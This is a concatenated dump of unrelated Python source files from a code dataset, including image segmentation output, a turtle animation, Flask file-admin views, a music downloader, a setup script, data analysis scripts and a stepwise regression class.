'test_predict', name) + \".{}_{}.png\".format(output_suffix, i)\n cv2.imwrite(filename, img)\n print(\"wrote : {}\".format(filename))\n\n pr = pr.argmax(axis=2)\n # print(pr.shape) # -> (576, 576)\n\n img = np.zeros((pr_height, pr_width, 3))\n\n for i in range(n_classes):\n v = 100 * np.count_nonzero(pr == i) / (pr_height * pr_width)\n print(\"{} : {}%\".format(i, v))\n\n b, g, r = colors[i]\n\n rCh = (pr == i) * r\n gCh = (pr == i) * g\n bCh = (pr == i) * b\n\n img[:, :, 2] += rCh[:, :]\n img[:, :, 1] += gCh[:, :]\n img[:, :, 0] += bCh[:, :]\n\n filename = os.path.join(dataset_base_dir, 'test_predict', name) + \".{}.png\".format(output_suffix)\n cv2.imwrite(filename, img)\n print(\"wrote : {}\".format(filename))\n\n else:\n exit(help)\n","sub_path":"pspnet-4class.py","file_name":"pspnet-4class.py","file_ext":"py","file_size_in_byte":30320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"266078300","text":"\nimport turtle\nfrom turtle import Turtle\n\n\nclass Ball(Turtle):\n\t\"\"\"docstring for Ball\"\"\"\n\tdef __init__(self, x, y ,dx, dy,r, color):\n\t\tTurtle.__init__(self)\n\t\tself.penup()\n\t\tself.goto(x, y)\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.dx = dx\n\t\tself.dy = dy\n\t\tself.r = r\n\t\tself.color(color)\n\t\tself.shape(\"circle\")\n\t\tself.shapesize(r/10)\n\t\tself.showturtle()\n\tdef move(self,screen_width, screen_height):\n\t\t\tcurrent_x = self.xcor()\n\t\t\tnew_x = current_x + self.dx\n\t\t\tcurrent_y = self.ycor()\n\t\t\tnew_y = current_y + self.dy\n\t\t\tright_ball_side = new_x + self.r\n\t\t\tleft_ball_side = new_x - self.r\n\t\t\tup_ball_side = new_y + self.r\n\t\t\tdown_ball_side = new_y - self.r\n\t\t\tself.goto(new_x,new_y)\n\t\t\tif screen_height <= up_ball_side :\n\t\t\t\tself.dy = -self.dy\n\t\t\telif -screen_height >= down_ball_side:\n\t\t\t\tself.dy = -self.dy\n\t\t\telif -screen_width >= left_ball_side:\n\t\t\t\tself.dx = -self.dx\n\t\t\telif screen_width <= right_ball_side:\n\t\t\t\tself.dx = -self.dx\n\n\t\t\t\n\n'''my_ball = Ball(0,0,2,2,50,\"red\")\nwhile True:\n\tmy_ball.move(200,200)\nturtle.mainloop()'''\n\t\t","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"334300222","text":"# coding: utf-8\nfrom google.appengine.ext import blobstore\nfrom werkzeug.http import parse_options_header\nfrom flask import Blueprint, render_template, url_for, request, redirect, abort\nfrom apps.file.models import File\nfrom auth import current_user_key, admin_required\nfrom apps.file.utils import check_owner\nfrom apps.file.admins.forms import FileForm\n\nmod = Blueprint(\n 'admins.file',\n __name__,\n url_prefix='/admins/file',\n template_folder='templates'\n)\n\n\ndef file_from_upload():\n try:\n uploaded_file = request.files['file']\n except:\n return None\n headers = uploaded_file.headers['Content-Type']\n blob_info_key = parse_options_header(headers)[1]['blob-key']\n blob_info = blobstore.BlobInfo.get(blob_info_key)\n\n file_ = File(\n owner_key=current_user_key(),\n blob_key=blob_info.key(),\n filename=blob_info.filename,\n content_type=blob_info.content_type,\n size=blob_info.size\n )\n file_.put()\n return file_\n\n\n@admin_required\n@mod.route('/', methods=['GET', 'POST'], endpoint='index')\ndef index():\n if request.method == 'POST':\n file_from_upload()\n return redirect(url_for('admins.file.index'))\n files = File.query(File.owner_key==current_user_key()).order(-File.created)\n return render_template(\n 'file/admins/index.html',\n files=files,\n upload_url=blobstore.create_upload_url(url_for('admins.file.index'))\n )\n\n@admin_required\n@mod.route('/delete//', methods=['POST'], endpoint='delete')\ndef file_delete(file_id):\n file_ = File.get_by_id(file_id)\n if not file_:\n abort(404)\n if not check_owner(file_):\n abort(403)\n file_.key.delete()\n return redirect(url_for('admins.file.index'))\n\n@admin_required\n@mod.route('/edit//', methods=['GET', 'POST'])\ndef edit(file_id):\n file_ = File.get_by_id(file_id)\n if not file_:\n abort(404)\n if not check_owner(file_):\n abort(403)\n form = FileForm(obj=file_)\n if request.method == 'POST' and form.validate_on_submit():\n if 'save' in request.form:\n form.populate_obj(file_)\n file_.put()\n if 'delete' in request.form:\n file_.key.delete()\n return redirect(url_for('admins.file.index'))\n return render_template('file/admins/edit.html', form=form, file_=file_)\n","sub_path":"apps/file/admins/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"2977791","text":"#!/usr/bin/env python3\nimport sys\nimport os\nfrom html.parser import HTMLParser\nfrom urllib.parse import urlparse\nimport urllib.request\nimport urllib.parse\nimport html\n\nclass AlbumHTMLParser(HTMLParser):\n def __init__(self):\n self.next_url = None\n self.music_files = set()\n HTMLParser.__init__(self)\n\n def handle_starttag(self, tag, attrs):\n if tag == 'a':\n attrs_d = dict(attrs)\n href = attrs_d.get('href')\n if href is not None:\n ext = href[href.rfind('.') + 1:]\n if ext in ['mp3', 'flac', 'm4a', 'ogg']:\n self.music_files.add(href)\n\ndef main():\n album_url = sys.argv[1]\n album_parser = AlbumHTMLParser()\n req = urllib.request.urlopen(album_url)\n album_parser.feed(req.read().decode('utf-8'))\n url_parsed = urlparse(req.geturl())\n domain = '%s://%s' % (url_parsed.scheme, url_parsed.netloc)\n # Despite the extension, these '.mp3' paths are HTML documents.\n for track in sorted(album_parser.music_files):\n track_parser = AlbumHTMLParser()\n if track.startswith('/'):\n track = domain + track\n req = urllib.request.urlopen(track)\n track_parser.feed(req.read().decode('utf-8'))\n for track_file in sorted(track_parser.music_files):\n req = urllib.request.urlopen(track_file)\n track_url_parsed = urlparse(req.geturl())\n music_filename = urllib.parse.unquote(os.path.basename(track_url_parsed.path))\n print(music_filename)\n music_fp = open(music_filename, 'wb')\n music_fp.write(req.read())\n with open('khinsider.txt', 'w') as txt_fp:\n txt_fp.write(album_url + '\\n')\n\nif __name__ == '__main__':\n main()\n","sub_path":"khinsider_download.py","file_name":"khinsider_download.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"599506001","text":"#!/usr/bin/env python\n'''\nCopyright 2017, United States Government, as represented by the Administrator of the National Aeronautics and Space Administration. All rights reserved.\n\nThe pyCMR platform is licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0.\n\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\n'''\nimport os\nfrom codecs import open\nfrom setuptools import setup, find_packages\n\nlongDescription = \"\"\"pyCMR\n===========\n\n\n * Created by: Manil Maskey (2016)\n * License:\n\n----\n\n~~~~~~~~~~~~\nRequirements\n~~~~~~~~~~~~\n\n * Python 2.7/3.2+\"\"\"\n\nhere = os.path.abspath(os.path.dirname(__file__))\n__version__ = '0.1.2'\n\n# get the dependencies and installs\nwith open(os.path.join(here, 'requirements.txt'), encoding='utf-8') as f:\n all_reqs = f.read().split('\\n')\n\ninstall_requires = [x.strip() for x in all_reqs if 'git+' not in x]\ndependency_links = [x.strip().replace('git+', '') for x in all_reqs if 'git+' not in x]\n\n\nsetup(\n name='pyCMR',\n version=__version__,\n author='Abdelhak Marouane',\n author_email='am0089@uah.edu',\n description='client API to ingest using CMR API',\n long_description=longDescription,\n url='https://github.com/nasa-cumulus/cmr',\n license='',\n classifiers=[\n 'Framework :: Pytest',\n 'Topic :: Scientific/Engineering :: GIS',\n 'Topic :: Scientific/Engineering',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'License :: Freeware',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n ],\n packages=find_packages(exclude=['docs', 'tests*']),\n include_package_data=True,\n install_requires=install_requires,\n dependency_links=dependency_links,\n setup_requires=['pytest-runner'],\n tests_require=['pytest']\n)\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"518472732","text":"from aocd import data\nimport numpy as np\nfrom aoc_wim.ocr import AOCR\n\nrows, cols = 6, 25\na = np.fromiter(data, int).reshape((-1, rows, cols))\nlayer = min(a, key=lambda v: (v == 0).sum())\nprint((layer == 1).sum() * (layer == 2).sum())\n\nimg = np.ones_like(layer) * 2\nfor layer in a:\n np.copyto(img, layer, where=(img == 2))\n\ntxt = AOCR[img]\nprint(txt)\n","sub_path":"aoc_wim/aoc2019/q08.py","file_name":"q08.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"158468028","text":"#-*- coding:utf-8 -*-\n\nfrom tornado.web import HTTPError\nfrom sqlalchemy.exc import DataError, IntegrityError\nfrom sqlalchemy.orm.exc import NoResultFound\n\nfrom distreet.models.store import Store\nfrom distreet.models.item import Item, Category\nfrom distreet.utils.photo import PhotoUploader\nfrom distreet.handlers.base import APIRequestHandler\nfrom distreet.tasks.search import index\nfrom distreet.tasks.photo import resize\n\n\nclass PutRequestHandler(APIRequestHandler):\n\n def post(self):\n success = False\n try:\n name = self.get_argument('name')\n category = self.get_argument('category')\n store = self.get_argument('store')\n except HTTPError:\n return self.finish({'success': success})\n try:\n cid = category.split('|')[0]\n sid = store.split('|')[0]\n if not name:\n raise ValueError\n cid = int(cid)\n sid = int(sid)\n except (ValueError, TypeError):\n return self.finish({'success': success})\n item = Item(\n name=name, category_id=cid,\n )\n item.store_id = sid\n try:\n price = float(self.get_argument('price', .00))\n except ValueError:\n price = .00\n try:\n item_id = int(self.get_argument('id', 0))\n except (TypeError, ValueError):\n item_id = 0\n if item_id:\n item.id = item_id\n item.price = price\n item.photo_ids = ''\n item.full_name = self.get_argument('full_name', item.name)\n item.detail = self.get_argument('detail', '')\n session = self.application.backend.get_session()\n try:\n try:\n item.store = session.query(Store).filter(\n Store.id == item.store_id).one()\n item.category = session.query(Category).filter(\n Category.id == item.category_id).one()\n except NoResultFound:\n raise DataError\n photo_uploader = PhotoUploader(self, **{'ref_type': 'Item'})\n ids = photo_uploader.upload()\n if ids:\n for photo_id in ids:\n resize.delay(photo_id)\n item.photo_ids = ','.join(map(str, ids))\n session.add(item)\n session.commit()\n success = True\n data = {'id': item.id,\n 'name': item.name.encode('utf-8'),\n 'store_id': item.store_id,\n 'category_id': item.category_id,\n 'detail': item.detail.encode('utf-8')}\n index.delay(data, 'distreet.item')\n except (DataError, IntegrityError):\n session.rollback()\n finally:\n session.close()\n\n return self.finish({'success': success})\n\n\nclass ItemListRequestHandler(APIRequestHandler):\n\n def get(self):\n success = False\n try:\n store_id = int(self.get_argument('sid'))\n except (HTTPError, ValueError):\n return self.finish({'success': success})\n\n try:\n limit = int(self.get_argument('limit', 10))\n except ValueError:\n limit = 10\n try:\n offset = int(self.get_argument('offset', 0))\n except ValueError:\n offset = 0\n\n session = self.application.backend.get_session()\n items = session.query(Item).filter(\n Item.store_id == store_id).limit(limit).offset(offset)\n success = True\n data = [{'name': item.name, 'store': item.store.name,\n 'photos': item.arrange_photos(),\n 'id': item.id, 'price': float(item.price)} for item in items]\n session.close()\n return self.finish({'success': success, 'data': data})\n","sub_path":"distreet/handlers/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"566603989","text":"class Solution:\n def maxProfit(self, prices: List[int]) -> int:\n sortedArray = self.mergeSort(prices)\n \n map = {}\n for x in range(0, len(prices)):\n map[prices[x]] = x\n \n if(map[sortedArray[0]] != len(sortedArray)-1):\n return sortedArray[-1] - sortedArray[0]\n \n def mergeSort(self,unsorted_list: List[int]) -> List[int]:\n if len(unsorted_list) <=1:\n return unsorted_list\n \n middle = len(unsorted_list)// 2\n left_list = unsorted_list[:middle]\n right_list = unsorted_list[middle:]\n \n left_list = self.mergeSort(left_list)\n right_list = self.mergeSort(right_list)\n \n return self.mergeHalves(left_list, right_list)\n \n def mergeHalves(self,left_list: List[int] , right_list: List[int]) -> List[int]:\n res = []\n while len(left_list) > 0 and len(right_list) > 0 :\n if left_list[0] <= right_list[0]:\n res.append(left_list[0])\n left_list.pop(0)\n elif right_list[0] < left_list[0]:\n res.append(right_list[0])\n right_list.pop(0)\n \n if len(left_list) > 0:\n res = res+left_list\n \n elif len(right_list) > 0:\n res = res+right_list\n \n return res\n\n\nprint(Solution.maxProfit([7,1,5,3,6,4]))\n \n \n \n \n \n \n ","sub_path":"MaxProfit.py","file_name":"MaxProfit.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"280395819","text":"from BotGuardInits import *\nfrom JsonSettingsParser import *\nimport telebot\n\nclass BotGuad():\n\n def __init__(self):\n self.settings = JsonSettingsParser()\n self.settings.parse()\n self.bot = telebot.TeleBot(self.settings.botToken) # token of my bot\n initFront(self)\n initBack(self.settings.camIndex)\n initHandlers(self)\n\n def run(self):\n print (\"бот включен\")\n self.bot.polling(none_stop=True)\n\n","sub_path":"BotGuardClass.py","file_name":"BotGuardClass.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"578467824","text":"def unique(values):\n lista = []\n [lista.append(i) for i in values if i not in lista]\n\n return lista\n\n \"\"\"\n Funkcja zwraca listę unikatowych wartości.\n Utrudnienie: Funkcja zwraca unikatowe wartości w kolejności wystąpienia.\n\n :param values: List of values to check.\n :type values: list\n :return: Unique values in order of appear.\n :rtype: list\n \"\"\"\n\n\nif __name__ == \"__main__\":\n assert [1, 5, 3, 6, 7, 2, 4] == unique([1, 5, 3, 5, 6, 7, 2, 1, 4, 1, 5])","sub_path":"lab_2/tasks/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"185920389","text":"#!/usr/bin/python\n\nimport os\nimport sys\nimport logging\nimport argparse\nimport traceback\nfrom collections import defaultdict\nfrom math import sqrt\nsys.path.append('python-tools')\nfrom graph import bron_kerbosch,neighbor\nfrom multiprocessing import Pool\n\nCofAlpha=1.36\nAlpha=0.05\n# Copy arguments from many process\nargs = None\ngraph = None\ndef init_cxt(xargs, xgraph):\n global args, graph\n args = xargs\n graph = xgraph\n\ndef main():\n global graph\n \n # Number of samples for each client\n samples = defaultdict(int)\n for line in args.distinfile:\n mac, val, freq = map(int, line.rstrip().split())\n samples[mac] += freq\n\n # Create graph with initially all connected vertices\n graph = [[0]*len(samples) for i in range(len(samples))]\n indexTomac = {}\n total = 0\n for line in args.siminfile:\n chunks = line.rstrip().split()\n c = int(chunks[0])\n indexTomac[total] = c\n\n for i in range(len(chunks)-1):\n ks,p = map(float,chunks[i+1].split(','))\n n = samples[indexTomac[i]]\n np = samples[c]\n # Null hypothesis rejected (i.e., not the same distribution)\n if p < Alpha or ks > CofAlpha*sqrt(float(n+np)/float(n*np)):\n pass\n else:\n # Add edge between vertices\n graph[i][total] = graph[total][i] = 1\n\n total += 1\n\n # Remove the clients not in the similarity data\n graph = [l[:total] for l in graph[:total]]\n pool = Pool(None, initializer = init_cxt, initargs = (args, graph))\n for result in pool.imap_unordered(processVertex, range(len(graph))):\n for clique in result:\n args.outfile.write(' '.join([str(indexTomac[c]) for c in clique]) + '\\n')\n\ndef processVertex(v):\n R = set(v)\n P = set(range(len(graph)))\n X = set()\n res = []\n for clique in bron_kerbosch(R, P, X, graph):\n res.append(clique)\n return res\n\nif __name__ == \"__main__\":\n # set up command line args\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\\\n description='Compute similarity statistics between client request distributions')\n parser.add_argument('distinfile', type=argparse.FileType('r'))\n parser.add_argument('siminfile', type=argparse.FileType('r'))\n parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'), default=sys.stdout)\n parser.add_argument('-q', '--quiet', action='store_true', default=False, help='only print errors')\n parser.add_argument('-v', '--verbose', action='store_true', default=False, help='print debug info. --quiet wins if both are present')\n args = parser.parse_args()\n\n # set up logging\n if args.quiet:\n level = logging.WARNING\n elif args.verbose:\n level = logging.DEBUG\n else:\n level = logging.INFO\n logging.basicConfig(\n format = \"%(levelname) -10s %(asctime)s %(module)s:%(lineno) -7s %(message)s\",\n level = level\n )\n\n main()\n","sub_path":"scripts/group_client_distributions.py","file_name":"group_client_distributions.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"590790123","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# __author__ = 'TesterCC'\n# __time__ = '17/9/27 00:38'\n\n'''\nPython 2.7 协程 gevent\nhttps://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000/001407503089986d175822da68d4d6685fbe849a0e0ca35000\n\n实际代码里,我们不会用gevent.sleep()去切换协程,而是在执行到IO操作时,gevent自动切换\n'''\n\nfrom gevent import monkey; monkey.patch_all()\nimport gevent\nimport urllib2\n\n\ndef f(url):\n print('GET: %s' % url)\n resp = urllib2.urlopen(url)\n data = resp.read()\n print('%d bytes received from %s.' % (len(data), url))\n\ngevent.joinall([\n gevent.spawn(f, 'https://www.python.org/'),\n gevent.spawn(f, 'https://www.yahoo.com/'),\n gevent.spawn(f, 'https://github.com/'),\n])","sub_path":"liaoxuefeng/gevent_demo2.py","file_name":"gevent_demo2.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"243021283","text":"from pylab import *\nimport numpy as np\nimport sys\n\nInput= sys.argv[1]\nOutput= sys.argv[2]\n\ndata = loadtxt(\"%s\"%Input)\nz = data\n#title('lalal')\ncontourf(z, 40)\ncolorbar()\nsavefig(\"%s\"%Output,dpi=800)\n\n","sub_path":"code/2D_Contour/mkplot.py","file_name":"mkplot.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"142789930","text":"# export PATH=/home/yule/anaconda3/bin:$PATH\n\nimport pandas as pd \nimport numpy as np\n\ndf_wine = pd.read_csv('wine.data',header=None)\n\n#print(df_wine.head())\n\n# 划分出测试集和训练集\nfrom sklearn.model_selection import train_test_split\nX,y = df_wine.iloc[:,1:].values, df_wine.iloc[:,0].values\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.3,random_state=0)\n\n#标准化:均值为0,方差为1\nfrom sklearn.preprocessing import StandardScaler\nstdsc = StandardScaler()\nX_train_std = stdsc.fit_transform(X_train)\nX_test_std =stdsc.transform(X_test)\n\n#计算协方差矩阵的特征对\ncov_mat = np.cov(X_train_std.T) #得到协方差矩阵\neigen_vals,eigen_vecs = np.linalg.eig(cov_mat) #得到特征向量,存入13*13的eigen_vecs中\nprint('\\nEigenvalues \\n%s' % eigen_vals)\n'''\nEigenvalues\n[ 4.8923083 2.46635032 1.42809973 1.01233462 0.84906459 0.60181514\n 0.52251546 0.08414846 0.33051429 0.29595018 0.16831254 0.21432212\n 0.2399553 ]\n'''\n\n#绘制特征值的方差贡献率图像\ntot = sum(eigen_vals)\nvar_exp = [(i / tot) for i in sorted(eigen_vals,reverse=True)] #计算每个的方差贡献率\ncum_var_exp = np.cumsum(var_exp) #计算出累计方差\n \nimport matplotlib.pyplot as plt \nplt.bar(range(1,14),var_exp,alpha=0.5,align='center',label='individual explained variance')\nplt.step(range(1,14),cum_var_exp,where='mid',label='cumulative explained variance')\nplt.ylabel('Explained variance ratio')\nplt.xlabel('Principal components')\nplt.legend(loc='best')\nplt.show()\n","sub_path":"Machine Learning - Mofan/Python机器学习-代码/5.1总体方差与贡献方差.py","file_name":"5.1总体方差与贡献方差.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"49243202","text":"import ssl\nssl.PROTOCOL_SSLv23 = ssl.PROTOCOL_TLSv1 # target server accepts only TLSv1\n\nimport datetime, logging, os, queue, sys, requests\nfrom multiprocessing import Process, Queue\n\nfrom config import *\n\ndef ssns_generator(q_ssns):\n logging.info('Starting to put SSNs in the queue.')\n start_date = datetime.date(1990, 7, 1)\n\n for is_female in range(2):\n for day in range(days_max):\n current_date = start_date + datetime.timedelta(day)\n ssn_birthdate = current_date.strftime('%y%m%d')\n\n if is_female:\n ssn_birthdate = str(int(ssn_birthdate) + 5000)\n\n if day % 30 == 0:\n logging.info('Currently at ' + str((day * 100) / days_max) + '%.')\n\n for ssn_order in range(1000):\n ssn_order = '{0:03d}'.format(ssn_order)\n ssn_checkdigit = int(ssn_birthdate + ssn_order) % 11\n\n if ssn_checkdigit == 10:\n continue\n\n q_ssns.put(ssn_birthdate + ssn_order + str(ssn_checkdigit))\n\n logging.info('All requested SSNs were generated.')\n\n\ndef fetcher(q_ssns, q_results):\n logging.info('Fetcher ' + str(os.getpid()) + ' started.')\n s = requests.Session()\n while True:\n try:\n ssn = q_ssns.get(timeout=10)\n except queue.Empty:\n logging.info('Fetcher ' + str(os.getpid()) + ' ended. No jobs available.')\n exit()\n\n login_data['TBrc'] = ssn\n r = s.post(login_url, data=login_data)\n if 'Bpokoj' in r.text:\n r = s.post(info_url, data=info_data)\n user = {\n 'firstname': re_search_return('ljmeno\">(.*?)<', r.text),\n 'lastname': re_search_return('lprijmeni\">(.*?)<', r.text),\n 'ssn': ssn,\n 'building': re_search_return('Lblok\">(.*?)<', r.text),\n 'room': re_search_return('Lpokoj\">(.*?)<', r.text)\n }\n q_results.put(user)\n else:\n continue\n\n\ndef saver(q_results):\n logging.info('Saver ' + str(os.getpid()) + ' started.')\n while True:\n print(q_results.get())\n\n\nif __name__ == '__main__':\n logging.basicConfig(stream=sys.stdout, level=logging.INFO)\n q_ssns = Queue(max_pregenerated_ssns)\n q_results = Queue()\n\n Process(target=ssns_generator, args=(q_ssns,)).start()\n for i in range(fetchers_threads):\n Process(target=fetcher, args=(q_ssns, q_results)).start()\n p_saver = Process(target=saver, args=(q_results,))\n p_saver.start()\n p_saver.join()\n","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"125152522","text":"import re\nimport actions as ac\n\ndef search(querry,list):\n regex = '(^.*' + re.escape(querry) + '.*$)'\n matches=[]\n for element in list:\n z=re.match(regex, element, re.IGNORECASE)\n if z:\n matches.append(z.groups()[0])\n if len(matches)>0:\n return matches\n if len(matches)==0:\n failure_statement=\"no contacts\" #return won't print on shell if given variable\n return failure_statement\n","sub_path":"regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"360218119","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 14 18:05:45 2018\n\n@author: charleshen\n\"\"\"\n\nfrom utils.pandastool import ParseDFtypes\nfrom utils.modelbase import ModelBase\n#from dataset import load_MedExp\nfrom io import StringIO\n\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\n\nimport pandas as pd\n\nimport coloredlogs,logging\ncoloredlogs.install()\n\n\n\n\n\n\n\nclass StepwiseReg(ModelBase):\n\n \"\"\"\n 逐步回归分析方法,要求输入一个dfx(dataframe),dfy(dataframe),其中dfy为一列数据,\n 返回一个最小二乘的线性模型的参数dataframe,在‘result‘关键字中\n \n \n 方法\n -------\n get_info : \n 获取该模型的信息, 返回一个字典,包含‘id’和‘name’, 'description','limited'关键字\n 含义分别为:模型的id, 模型的名称,模型的描述,模型的适用范围\n\n run: \n 参数\n ----------\n dfx: pandas DataFrame\n 如果方法为‘pearson’,需要每列的数据都是数字型数据,不能是字符串或者object\n \n dfy: pandas DataFrame\n ‘pearson’,需要一列的数据都是数字型数据,不能是字符串或者object\n \n \n 返回结果\n ---------- \n 返回一个字典,带有‘result’关键字,其值为coef, p, r, VIF 等等系数组成的dataframe\n\n \n \"\"\"\n \n \n \n def __init__(self, \n model_id = None, \n model_limiation = None,\n ):\n \n self._id_ = model_id\n self._limitation_ = model_limiation\n\n \n \n def get_info(self):\n \n return {'id': self._id, \n 'name': self._name, \n 'description': self._description,\n 'limited':self._limitation\n }\n \n \n def run(self, \n dfx, \n dfy): \n\n \n dfy = dfy.reset_index(drop=True)\n dfx = dfx.reset_index(drop=True) \n \n \n \n msg = {}\n \n xl = len(dfx)\n yl = len(dfy)\n if xl != yl:\n logging.error('the length of input X:%s is not equal the length of Y: %s ! ' % (xl,yl))\n msg['error'] = 'the length of input X:%s is not equal the length of Y: %s ! ' % (xl,yl)\n return {'result':pd.DataFrame(), 'msg':msg} \n \n \n \n if len(dfy.columns) != 1:\n logging.warning('input DataFrame dfy has more than one columns, but only the first colum will be used!')\n msg['warning'] = 'input DataFrame dfy has more than one columns, but only the first colum will be used!'\n \n _dfy = dfy[[dfy.columns[0]]]\n \n else:\n _dfy = dfy\n \n x_numer_cols, x_cate_cols = ParseDFtypes(dfx)\n y_numer_cols, y_cate_cols = ParseDFtypes(_dfy)\n\n if (x_numer_cols ==[]) | (y_numer_cols == []):\n logging.error('All input DataFrame are no numeric columns, Please check your input data!')\n \n msg['error'] = 'All input DataFrame are no numeric columns, Please check your input data!'\n dfmain =pd.DataFrame()\n \n \n else:\n \n _dfx = dfx[x_numer_cols]\n X_cols = stepwise_selection(_dfx, _dfy)\n \n logging.info('the following variables are selected: %s' % X_cols)\n \n dfXS = _dfx[X_cols]\n \n X = sm.add_constant(dfXS, prepend=True)\n y = _dfy\n \n f = smf.OLS(y, X).fit()\n tables = f.summary().tables\n\n df_list = [pd.read_html(StringIO(t.as_html()))[0] for t in tables ]\n\n def parse_table02(m_inf):\n df1 = m_inf[[0,1]]\n df1.columns=['items','values'] \n df2 = m_inf[[2,3]]\n df2.columns=['items','values'] \n dfinfo1 = df1.append(df2).dropna().set_index('items') \n return dfinfo1.T\n\n dfinfo0 = parse_table02(df_list[0])\n dfinfo2 = parse_table02(df_list[2])\n\n dfinfo1 = df_list[1].fillna('Variables').set_index(0)\n dfinfo1 = dfinfo1.T.set_index('Variables').T\n\n dfmain = dfinfo1[dfinfo1.columns[:4]]\n\n dfad = dfinfo0[['R-squared:',\n 'Adj. R-squared:', \n 'F-statistic:']].join(dfinfo2[['Durbin-Watson:',\n 'Jarque-Bera (JB):',\n 'Omnibus:']])\n\n variables = f.model.exog\n dfmain['VIF'] = [variance_inflation_factor(variables, i) for i in range(variables.shape[1])]\n for i in dfad.columns:\n dfmain[i] = dfad[i].iloc[0]\n \n\n return {'result':dfmain, 'msg':msg}\n \n \n \n \ndef stepwise_selection(X, y, \n initial_list=[], \n threshold_in=0.05, \n threshold_out = 0.1, \n verbose=True):\n \"\"\" Perform a forward-backward feature selection \n based on p-value from statsmodels.api.OLS\n Arguments:\n X - pandas.DataFrame with candidate features\n y - list-like with the target\n initial_list - list of features to start with (column names of X)\n threshold_in - include a feature if its p-value < threshold_in\n threshold_out - exclude a feature if its p-value > threshold_out\n verbose - whether to print the sequence of inclusions and exclusions\n Returns: list of selected features \n Always set threshold_in < threshold_out to avoid infinite looping.\n See https://en.wikipedia.org/wiki/Stepwise_regression for the details\n \"\"\"\n included = list(initial_list)\n while True:\n changed=False\n # forward step\n excluded = list(set(X.columns)-set(included))\n new_pval = pd.Series(index=excluded)\n for new_column in excluded:\n model = sm.OLS(y, sm.add_constant(pd.DataFrame(X[included+[new_column]]))).fit()\n new_pval[new_column] = model.pvalues[new_column]\n best_pval = new_pval.min()\n if best_pval < threshold_in:\n best_feature = new_pval.idxmin()\n included.append(best_feature)\n changed=True\n if verbose:\n logging.info('Add {:3} with p-value {:.6}'.format(best_feature, best_pval))\n\n # backward step\n model = sm.OLS(y, sm.add_constant(pd.DataFrame(X[included]))).fit()\n # use all coefs except intercept\n pvalues = model.pvalues.iloc[1:]\n worst_pval = pvalues.max() # null if pvalues is empty\n if worst_pval > threshold_out:\n changed=True\n worst_feature = pvalues.idxmax()\n included.remove(worst_feature)\n if verbose:\n logging.info('Drop {:3} with p-value {:.6}'.format(worst_feature, worst_pval))\n if not changed:\n break\n return included\n \n\nif __name__ == '__main__':\n \n #读取数据\n from dataset import load_MedExp\n \n\n testdata = load_MedExp()\n dfx = testdata[['educdec', 'med','age','fmde']]\n dfy = testdata[['ndisease']]\n \n \n \n #类的初始化\n O = StepwiseReg()\n\n #打印该类描述的信息\n print(O.get_info().get('description'))\n \n #执行运算,传入tsx、tsy参数\n dict_res = O.run(dfx,dfy)\n \n #获取返回的字典\n dict_res.get('result')\n ","sub_path":"MedLearn/advance/advance_e_StepwiseReg.py","file_name":"advance_e_StepwiseReg.py","file_ext":"py","file_size_in_byte":8021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"514389724","text":"#chapter 12 